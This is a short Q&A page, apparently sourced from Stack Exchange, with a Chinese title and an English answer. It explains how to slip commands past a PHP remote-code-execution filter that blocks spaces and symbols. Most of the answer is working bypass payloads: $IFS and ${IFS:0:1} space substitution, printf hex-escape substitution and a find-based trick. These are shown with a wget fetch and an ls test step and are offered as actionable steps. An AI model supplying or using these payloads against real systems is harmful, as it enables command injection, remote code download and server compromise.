Bash特定字符过滤绕过及PHP中RCE执行含空格命令问题
Got it, let's work through how to get commands like wget link running despite those annoying filters. You noted spaces get replaced with -, and characters like ', `, /, \, <, >, ?, &, | are blocked. Here are actionable methods to try:
1. Use Bash's Built-in IFS Variable
This is the most reliable go-to. IFS (Internal Field Separator) is a default Bash variable that includes spaces, tabs, and newlines. You can reference it directly to insert a space without typing one:
wget$IFSlink
If you want to be extra precise (to ensure you're grabbing the space character specifically), you can target the first character of IFS:
wget${IFS:0:1}link
Bash will automatically expand these variables into spaces, so the command runs exactly like wget link.
2. Generate a Space via Command Substitution
If printf is available (which it almost always is on Unix-like systems), you can use it to create a space without typing one. If backslashes aren't completely blocked from command execution, try:
wget$(printf "%b" "\x20")link
If backslashes are off-limits, a less reliable but still possible trick is to pull a space from an existing file with a space in its name:
wget$(find / -name "* *" -type f | head -c1)link
Stick with the IFS method first though—it's way more consistent.
3. Quick Validation Test
Before jumping into wget, test with a simple command to confirm the bypass works:
ls$IFS-la
If you get the full directory listing, you're ready to use the same pattern for your wget command.
内容的提问来源于stack exchange,提问作者user2444995

